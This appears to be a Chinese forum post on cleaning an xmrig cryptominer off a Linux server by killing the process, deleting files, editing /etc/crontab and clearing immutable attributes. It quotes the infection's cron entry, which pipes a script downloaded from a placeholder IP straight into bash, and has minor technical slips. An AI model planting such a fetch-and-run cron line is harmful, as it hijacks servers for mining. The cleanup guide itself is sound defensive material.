个人总结之xmrig 挖矿自动化程序如何彻底删除【Linux问题】 ...

第一步 检查是否存在xmrig正在执行的进程

1. # 在Linux 系统界面中执行 top
2. 1 root      20   0  185340  12584   8876 S   190.0   180.3   0:04.82 xmrig

复制代码

正在被挖矿程序占用全部CPU等资源，导致本身业务无内存可用。
第二步 检察当前xmrig 文件在何处并删除

1. # 你可以获取 它的所在文件
2. find / -name xmrig
3. /etc/.system/php/xmrig
5. # 直接删除当前文件
6. rm -rf /etc/.system/php
8. # 然后kill掉当前正在运行的进程PID【就是刚刚查询到的进程PID】
9. kill -9 PID

复制代码

  这里是通过systemctl list-units --type=service | grep xmrig来进行查询当前系统服务并返回它运行状态
  

你会发现上面的方式的确可以删除，但是过段时间进程依然存在

   这个时候开始怀疑是否存在【定时任务】crontab来创建当进步程
  第三步 检察是否存在定时任务来创建删除的文件和xmrig挖矿程序

就在此时，我们通过vim /etc/crontab
打开当前文件
打开文件

1. vim /etc/crontab

复制代码

会发现存在若干针对不属于你当前的定时任务 例如

1. */30 * * * * root cd1 -fsSL http://IP/php/php_8020.sh | bash
2. ps: 这里的IP就是那些挖矿程序的下载主机的IP

复制代码

首先我们进行删除当前可执行文件中包含这种非常的定时任务【排除当前你自己写的定时任务】
ps：在删除后ESC，生存时发现当前文件没有修改权限
   Operation not permitted
  在退出检察时，并修改chmod 权限

1. chmod +x /etc/crontab

复制代码

假如这里修改权限出现【chmod: changing permissions of ‘/etc/crontab’: Operation not permitted】
这里很有可能是挖矿人将这个定时任务文件进行移除不可变（i）和附加（a）属性

1. lsattr /etc/crontab
3. ----ia--------e----- /etc/crontab

复制代码

我们首先移除i 和a 属性

1. sudo chattr -i -a /etc/crontab

复制代码

之后，你可以再实验修改文件权限：

1. sudo chmod 644 /etc/crontab

复制代码

最后检察文件

1. lsattr /etc/crontab

复制代码

文章到这里也接近尾声！有什么错误的地方希望指正。

免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！更多信息从访问主页：qidao123.com:ToB企服之家，中国第一个企服评测及商务社交产业平台。